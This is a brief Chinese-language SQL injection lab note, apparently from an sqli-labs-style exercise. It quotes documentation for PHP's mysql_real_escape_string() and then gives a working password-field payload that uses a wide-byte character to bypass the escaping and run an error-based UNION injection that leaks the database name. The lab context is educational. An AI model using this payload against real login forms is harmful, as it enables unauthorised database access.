0X01 看看源码
what is mean?
定义和用法 mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。 下列字符受影响: x00 ' " x1a 如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。 语法 mysql_real_escape_string(string,connection) 参数 描述 string 必需。规定要转义的字符串。 connection 可选。规定 MySQL 连接。如果未规定,则使用上一个连接。 说明 本函数将 string 中的特殊字符转义,并考虑到连接的当前字符集,因此可以安全用于 mysql_query()。
同样用我们34+5关的方法绕过
正确的用户名
密码:�' union select count(*), concat((select database()), floor(rand()*2))as a from information_schema.tables group by a#
0X02组合拳打法
切记 学习之路 少就是多